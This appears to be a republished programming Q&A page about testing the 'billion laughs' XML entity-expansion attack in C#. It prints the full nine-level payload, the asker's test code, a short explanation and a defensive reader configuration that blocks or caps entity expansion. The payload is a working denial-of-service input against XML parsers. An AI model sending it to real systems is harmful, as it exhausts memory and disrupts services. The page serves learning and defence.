Is the billion laughs attack supposed to work in C#?

Updated: 2024-10-25 03:16:06

Problem description

I am trying to test the XML code from an MSDN magazine page where it says that the following lines of code will cause an increase of memory usage up to 3GB when processing.

```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
```

When I tried to paste that text into an XML file in Visual Studio, it indeed showed an increase in memory and also in CPU usage. However, when I tried to put it in a text file instead of an XML file and load it using C#, it didn't have any impact.

Update: I thought the LoadXml method was supposed to have an impact, but I guess that is not the processing part. When I tried to get the first child, it (i.e. C#) threw an exception saying that MaxCharactersFromEntities was exceeded.

Update: here is my code as well:

```csharp
using System;
using System.Xml;

namespace BillionLaughsAttack
{
    class Program
    {
        // The file containing the billion laughs document shown above.
        // A .txt file, since an .xml file causes Visual Studio to parse it.
        static String xmlFileLocation = "./MyData/DeepXML.txt";

        static void Main(string[] args)
        {
            String xmlContent = null;
            System.IO.StreamReader sr;
            System.Xml.XmlDocument document = new XmlDocument();
            try
            {
                sr = new System.IO.StreamReader(xmlFileLocation);
                xmlContent = sr.ReadToEnd();

                // Load XML containing the Billion Laughs Attack (this won't do anything!)
                document.LoadXml(xmlContent);

                // Process XML by getting the first child (this will cause an exception!)
                String val = document.FirstChild.Value;
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
        }
    }
}
```

Solution

This attack exploits a vulnerable XML feature.

Running it through an XML parser will recursively expand the entities and occupy a large amount of memory. Reading it as plain text won't do anything at all.
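
An added example, not part of the original question or answer: two ways to configure the .NET reader so that nested entity definitions like the ones above are either refused outright or cut off by the `MaxCharactersFromEntities` limit the question ran into. The names `EntityExpansionDemo`, `TryLoad` and `Nested`, the three-level sample document and the limit of 100 are assumptions made for illustration.

```csharp
using System;
using System.IO;
using System.Xml;

static class EntityExpansionDemo
{
    // Constructed sample: three nested entity levels, 300 characters once fully expanded.
    const string Nested =
        "<?xml version=\"1.0\"?>" +
        "<!DOCTYPE lolz [" +
        "<!ENTITY lol \"lol\">" +
        "<!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">" +
        "<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">" +
        "]><lolz>&lol3;</lolz>";

    // Parse untrusted XML with explicit settings and describe the outcome.
    static string TryLoad(string xml, XmlReaderSettings settings)
    {
        try
        {
            using (var reader = XmlReader.Create(new StringReader(xml), settings))
            {
                var doc = new XmlDocument { XmlResolver = null }; // no external resolution
                doc.Load(reader); // entities are expanded by the reader during Load
                return "loaded, text length " + doc.DocumentElement.InnerText.Length;
            }
        }
        catch (XmlException e)
        {
            return "rejected: " + e.Message;
        }
    }

    static void Main()
    {
        // Option 1: refuse any document that carries a DOCTYPE.
        var noDtd = new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null };

        // Option 2: DTDs are required, so cap the text that entities may expand to.
        var capped = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Parse,
            MaxCharactersFromEntities = 100, // illustrative limit, below the sample's 300
            XmlResolver = null
        };

        Console.WriteLine("Prohibit: " + TryLoad(Nested, noDtd));
        Console.WriteLine("Capped:   " + TryLoad(Nested, capped));
    }
}
```

Both calls end in an `XmlException` for this sample; a document without a DOCTYPE loads normally under either configuration.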


Published: 2023-11-14 02:59:30
Article link: https://www.elefans.com/category/jswz/34/1586033.html
